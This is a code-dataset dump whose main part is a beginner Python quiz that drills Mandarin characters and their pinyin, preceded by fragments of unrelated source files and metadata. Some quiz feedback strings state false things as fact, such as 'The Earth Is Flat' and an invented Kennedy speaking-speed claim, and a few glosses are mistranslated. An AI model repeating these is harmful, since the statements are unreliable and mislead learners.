loss_obj_dict['tt_FB_BG_loss'] = (FB_BG_loss1 + FB_BG_loss2)/2
del indices1,indices2
loss_per_obj.append(loss_obj_dict)
### Loss per object done
#### Append for loss per image
loss_per_batch.append(loss_per_obj)
return loss_per_batch | 50.905512 | 138 | 0.528616 | 7,145 | 51,720 | 3.579006 | 0.058502 | 0.013452 | 0.017519 | 0.024636 | 0.85402 | 0.835953 | 0.814758 | 0.784413 | 0.776044 | 0.757234 | 0 | 0.05398 | 0.340932 | 51,720 | 1,016 | 139 | 50.905512 | 0.696219 | 0.228094 | 0 | 0.609907 | 0 | 0 | 0.018782 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03096 | false | 0.001548 | 0.020124 | 0 | 0.086687 | 0.009288 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
54ec368686010f7332842630dc7e7a015ec50fdb | 47 | py | Python | th_address/models/__init__.py | anndream/odoo-docker-training-v14-v2 | 7ef8f714ab151d61502d79f53badc3367335653f | [
"MIT"
] | null | null | null | th_address/models/__init__.py | anndream/odoo-docker-training-v14-v2 | 7ef8f714ab151d61502d79f53badc3367335653f | [
"MIT"
] | null | null | null | th_address/models/__init__.py | anndream/odoo-docker-training-v14-v2 | 7ef8f714ab151d61502d79f53badc3367335653f | [
"MIT"
] | null | null | null | from . import models, res_company, res_partner
| 23.5 | 46 | 0.808511 | 7 | 47 | 5.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12766 | 47 | 1 | 47 | 47 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54f463dde5a70f0fd5feb3989e62c98e8adfb945 | 40,845 | py | Python | Chinses_Word_Generator/Generator.py | CasioKing/Level-up-your-Mandarin-Chinese | cfadeaa288afdc795c92180f7a7501e91ec824e9 | [
"MIT"
] | null | null | null | Chinses_Word_Generator/Generator.py | CasioKing/Level-up-your-Mandarin-Chinese | cfadeaa288afdc795c92180f7a7501e91ec824e9 | [
"MIT"
] | null | null | null | Chinses_Word_Generator/Generator.py | CasioKing/Level-up-your-Mandarin-Chinese | cfadeaa288afdc795c92180f7a7501e91ec824e9 | [
"MIT"
] | null | null | null | import random
import time
# This is where your score will be kept
score = 0
total = 0
# Here is the data for all the characters/words used in the program
def word_1(word='水'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Shui')
if answer.lower() == 'Shui'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return '"Empty your mind, be formless, shapeless-like water."-Bruce Lee\n'
def word_2(word='电视'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('DianShi')
if answer.lower() == 'DianShi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means TV\n'
def word_3(word='手机'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShouJi')
if answer.lower() == 'ShouJi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means cell phone\n'
def word_4(word='电脑'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('DianNao')
if answer.lower() == 'DianNao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means computer\n'
def word_5(word='避孕套'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('BiYunTao')
if answer.lower() == 'BiYunTao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Your Parents Would Be Proud. This means condom\n'
def word_6(word='颜色'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YanSe')
if answer.lower() == 'YanSe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'President Kennedy was the fastest random speaker in the world with upwards of 350 words per minute.\nThis' \
' means color\n'
def word_7(word='杯子'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('BeiZi')
if answer.lower() == 'BeiZi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is cup\n'
def word_8(word='怎麽樣'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ZenMeYang')
if answer.lower() == 'ZenMeYang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'The sound of E.T. walking was made by someone squishing her hands in jelly.\nThis is a way of asking ones' \
' opinion\n'
def word_9(word='飯店'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('FanDian')
if answer.lower() == 'FanDian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'The Earth Is Flat.\nThis is restaurant\n'
def word_10(word='碉堡了'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('DiaoBaoLe')
if answer.lower() == 'DiaoBaoLe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is like saying amazing!\n'
def word_11(word='明天'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('MingTian')
if answer.lower() == 'MingTian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Use this to say tomorrow!\n'
def word_12(word='昨天'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ZuoTian')
if answer.lower() == 'ZuoTian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Use this to say yesterday!\n'
def word_13(word='笑'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Xiao')
if answer.lower() == 'Xiao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Use this to say laugh!\n'
def word_14(word='能'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Neng')
if answer.lower() == 'Neng'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means can\n'
def word_15(word='炒飯'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ChaoFan')
if answer.lower() == 'ChaoFan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Don\'t touch my fried rice.\n'
def word_16(word='變態'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('BianTai')
if answer.lower() == 'BianTai'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say abnormal.\n'
def word_17(word='漂亮'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('PiaoLiang')
if answer.lower() == 'PiaoLiang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Beautiful.\n'
def word_18(word='商店'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShangDian')
if answer.lower() == 'ShangDian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say store.\n'
def word_19(word='学习'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('XueXi')
if answer.lower() == 'XueXi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is what you\'re doing aka learning or to study.\n'
def word_20(word='笔'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Bi')
if answer.lower() == 'Bi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say pen or pencil.\n'
def word_21(word='菜'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Cai')
if answer.lower() == 'Cai'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say vegetable and dish depending on context.\n'
def word_22(word='茶'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Cha')
if answer.lower() == 'Cha'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say tea.\n'
def word_23(word='常常'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ChangChang')
if answer.lower() == 'ChangChang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say often.\n'
def word_24(word='周'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Zhou')
if answer.lower() == 'Zhou'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say week.\n'
def word_25(word='周末'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ZhouMo')
if answer.lower() == 'ZhouMo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say weekend.\n'
def word_26(word='做'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Zuo')
if answer.lower() == 'Zuo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is to do.\n'
def word_27(word='都'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Dou')
if answer.lower() == 'Dou'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say both or all.\n'
def word_28(word='难'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Nan')
if answer.lower() == 'Nan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say difficult.\n'
def word_29(word='更'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Geng')
if answer.lower() == 'Geng'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is an adverb that means more.\n'
def word_30(word='用'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Yong')
if answer.lower() == 'Yong'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say use.\n'
def word_31(word='去'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Qu')
if answer.lower() == 'Qu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say go.\n'
def word_32(word='会'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Hui')
if answer.lower() == 'Hui'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say can.\n'
def word_33(word='多'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Duo')
if answer.lower() == 'Duo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This adjective means many.\n'
def word_34(word='书包'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShuBao')
if answer.lower() == 'ShuBao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say backpack.\n'
def word_35(word='话'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Hua')
if answer.lower() == 'Hua'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say talk.\n'
def word_36(word='活'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Huo')
if answer.lower() == 'Huo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say life and can also be used to mean saved a life.\n'
def word_37(word='星期'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('XingQi')
if answer.lower() == 'XingQi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means day of the week.\n'
def word_38(word='影片'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YingPian')
if answer.lower() == 'YingPian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say video.\n'
def word_39(word='电玩'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('DianWan')
if answer.lower() == 'DianWan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say video game.\n'
def word_40(word='书'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Shu')
if answer.lower() == 'Shu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say book.\n'
def word_41(word='歌曲'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('GeQu')
if answer.lower() == 'GeQu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means song.\n'
def word_42(word='听'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Ting')
if answer.lower() == 'Ting'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say listen.\n'
def word_43(word='唱'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Chang')
if answer.lower() == 'Chang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say sing.\n'
def word_44(word='跳'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Tiao')
if answer.lower() == 'Tiao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means jump.\n'
def word_45(word='看'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Kan')
if answer.lower() == 'Kan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say watch.\n'
def word_46(word='打'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Da')
if answer.lower() == 'Da'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say strike or play.\n'
def word_47(word='球'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Qiu')
if answer.lower() == 'Qiu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say sphere or ball.\n'
def word_48(word='热'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Re')
if answer.lower() == 'Re'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say hot.\n'
def word_49(word='音乐'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YinYue')
if answer.lower() == 'YinYue'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say music.\n'
def word_50(word='生活'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShengHuo')
if answer.lower() == 'ShengHuo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means life in a general way.\n'
def word_51(word='有的(时候)'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YouDe(ShiHou)')
if answer.lower() == 'YouDe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means some(times).\n'
def word_52(word='火'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Huo')
if answer.lower() == 'Huo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means fire or rage.\n'
def word_53(word='油'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('You')
if answer.lower() == 'You'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means grease/oil.\n'
def word_54(word='加'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Jia')
if answer.lower() == 'Jia'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means add.\n'
def word_55(word='帮'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Bang')
if answer.lower() == 'Bang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is the verb help.\n'
def word_56(word='就'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Jiu')
if answer.lower() == 'Jiu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to come near or just.\n'
def word_57(word='莫'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Mo')
if answer.lower() == 'Mo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means do not, can not, and is a negative word.\n'
def word_58(word='真'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Zhen')
if answer.lower() == 'Zhen'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means true.\n'
def word_59(word='觉得'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('JueDe')
if answer.lower() == 'JueDe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to think or feel.\n'
def word_60(word='别的'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('BieDe')
if answer.lower() == 'BieDe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means other.\n'
def word_61(word='睡觉'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShuiJiao')
if answer.lower() == 'ShuiJiao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to sleep.\n'
def word_62(word='需要'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('XuYao')
if answer.lower() == 'XuYao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means need.\n'
def word_63(word='一般'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YiBan')
if answer.lower() == 'YiBan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means the same.\n'
def word_64(word='一样'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YiYang')
if answer.lower() == 'YiYang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means the same or alike.\n'
def word_65(word='其'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Qi')
if answer.lower() == 'Qi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means she, he, or it.\n'
def word_66(word='心'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Xin')
if answer.lower() == 'Xin'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means heart.\n'
def word_67(word='入'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Ru')
if answer.lower() == 'Ru'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to enter.\n'
def word_68(word='牛'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Niu')
if answer.lower() == 'Niu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means cow.\n'
def word_69(word='妙'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Miao')
if answer.lower() == 'Miao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means wonderful.\n'
def word_70(word='全'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Quan')
if answer.lower() == 'Quan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to make complete.\n'
def word_71(word='身'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Shen')
if answer.lower() == 'Shen'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means ones body or oneself.\n'
def word_72(word='作'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Zuo')
if answer.lower() == 'Zuo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means work and the verb can mean to grow.\n'
def word_73(word='水平'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShuiPing')
if answer.lower() == 'ShuiPing'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means standard or level.\n'
def word_74(word='从'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Cong')
if answer.lower() == 'Cong'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to join or follow.\n'
def word_75(word='床'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Chuang')
if answer.lower() == 'Chuang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means bed.\n'
def word_76(word='床單'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ChuangDan')
if answer.lower() == 'ChuangDan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means bed sheet.\n'
def word_77(word='床墊'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ChuangDian')
if answer.lower() == 'ChuangDian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means mattress.\n'
def word_78(word='毯子'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('TanZi')
if answer.lower() == 'TanZi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means blanket.\n'
def word_79(word='衣櫃'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YiGui')
if answer.lower() == 'YiGui'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means dresser.\n'
def word_80(word='枕頭'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ZhenTou')
if answer.lower() == 'ZhenTou'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means pillow.\n'
def word_81(word='木'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Mu')
if answer.lower() == 'Mu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means wood.\n'
def word_82(word='土'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Tu')
if answer.lower() == 'Tu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means earth or dirt; soil.\n'
def word_83(word='金'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Jin')
if answer.lower() == 'Jin'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means metal or gold.\n'
def word_84(word='臥室'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('WoShi')
if answer.lower() == 'WoShi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means bedroom.\n'
def word_85(word='浴室'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YuShi')
if answer.lower() == 'YuShi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means bathroom.\n'
# my_ListI is individual characters my_ListD is words with two characters
# and my_ListS is sentences
my_ListI = [word_1,word_13, word_14, word_20, word_21, word_22,word_24, word_26, word_27, word_28, word_29, word_30,
word_31, word_32, word_33,word_35, word_36, word_40, word_42, word_43, word_44, word_45,word_46, word_47,
word_48, word_52, word_53, word_54, word_55, word_56, word_57, word_58, word_65, word_66, word_67, word_68,
word_69, word_70, word_71, word_72, word_74, word_75, word_81, word_82, word_83
]
my_ListD = [word_2, word_3, word_4, word_6, word_7, word_9, word_11, word_12, word_15, word_16, word_17, word_18,
word_19, word_23, word_25, word_34, word_37, word_38, word_39, word_41, word_49, word_50, word_51, word_59,
word_60, word_61, word_62, word_63, word_64, word_73, word_76, word_77, word_78, word_79, word_80, word_84,
word_85
]
my_ListS = [word_5, word_8, word_10,
]
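# --- Added editorial sketch (not part of the original program) ---------------
# The word_1 .. word_85 functions above differ only in the character, its
# pinyin and its English meaning, so the same quiz could be driven by data.
# A minimal, illustrative sketch of that idea (these names are new and are
# never called by the original code):
EXAMPLE_WORDS = {
    '牛': ('niu', 'cow'),
    '床': ('chuang', 'bed'),
}

def example_ask(character, pinyin, meaning):
    """Ask a single question; return True when the answer matches the pinyin."""
    print(character)
    answer = input('Can you tell me this character? ').lower()
    if answer == 'idk':
        print(pinyin.capitalize())
    correct = answer == pinyin
    print('correct' if correct else 'wrong')
    print('This means {}.'.format(meaning))
    return correct
# ------------------------------------------------------------------------------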
attempts = 0
# This is a function for randomly displaying individual characters
def the_ProblemI():
    global score
    global total
    global attempts
    while attempts <= 1:
        print(random.choice(my_ListI)())
        time.sleep(.5)
        print('Score=', score)
        print('Total=', total, '\n')
        time.sleep(1)
        while total == 20:
            print('Would you like to continue?')
            does_Continue = input()
            if does_Continue.lower() == 'yes':
                score = 0
                total = 0
                the_ProblemI()
            else:
                # Grade on the score earned before resetting the counters.
                if score <= 11:
                    print('You Failed\n')
                elif score <= 13:
                    print('You scored a D\n')
                elif score <= 15:
                    print('You scored a C\n')
                elif score <= 17:
                    print('You scored a B\n')
                else:
                    print('Nice, you scored an A\n')
                score = 0
                total = 0
                the_Quiz()
# This is a function for randomly displaying double characters
def the_ProblemD():
    global score
    global total
    global attempts
    while attempts <= 1:
        print(random.choice(my_ListD)())
        time.sleep(.5)
        print('Score=', score)
        print('Total=', total, '\n')
        time.sleep(1)
        while total == 20:
            print('Would you like to continue?')
            does_Continue = input()
            if does_Continue.lower() == 'yes':
                score = 0
                total = 0
                the_ProblemD()
            else:
                # Grade on the score earned before resetting the counters.
                if score <= 11:
                    print('You Failed\n')
                elif score <= 13:
                    print('You scored a D\n')
                elif score <= 15:
                    print('You scored a C\n')
                elif score <= 17:
                    print('You scored a B\n')
                else:
                    print('Nice, you scored an A\n')
                score = 0
                total = 0
                the_Quiz()
# This is a function for randomly displaying sentences
def the_ProblemS():
    global score
    global total
    global attempts
    while attempts <= 1:
        print(random.choice(my_ListS)())
        time.sleep(.5)
        print('Score=', score)
        print('Total=', total, '\n')
        time.sleep(1)
        while total == 20:
            print('Would you like to continue?')
            does_Continue = input()
            if does_Continue.lower() == 'yes':
                score = 0
                total = 0
                the_ProblemS()
            else:
                # Grade on the score earned before resetting the counters.
                if score <= 11:
                    print('You Failed\n')
